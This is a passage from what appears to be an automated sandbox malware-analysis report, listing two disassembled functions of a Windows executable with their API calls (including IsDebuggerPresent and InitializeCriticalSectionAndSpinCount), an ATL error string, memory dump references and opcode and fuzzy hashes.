                                                                                        • Instruction Fuzzy Hash: 401130B18007089FC710DFAAC8C089AF7F8FF18314B50852FE58AD7612E734AA48CB54
                                                                                        Function 00464F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcscmp
                                                                                        • String ID: #32770
                                                                                        • API String ID: 2292705959-463685578
                                                                                        • Opcode ID: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                                                                        • Instruction ID: c10ae28a8aa268df33283df1156ce4f732750d60ee08a51e76ed462bd539b068
                                                                                        • Opcode Fuzzy Hash: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                                                                        • Instruction Fuzzy Hash: 91E0D13260023837E7209B55AC45FA7F7ACDB55B71F11006BFD04D3151D5649A45C7E5
                                                                                        Function 0043B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321
                                                                                          • Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303
                                                                                        Strings
                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                        • API String ID: 3158253471-631824599
                                                                                        • Opcode ID: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                                                                        • Instruction ID: 2b780658d3da49ad9f9e4503d56df9c93059da648c8d5ac8478d33f484e7c10e
                                                                                        • Opcode Fuzzy Hash: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                                                                        • Instruction Fuzzy Hash: 02E06DB02007208BD720AF29E5047467AE4EF14308F00897EE856C7341EBB8E488CBA9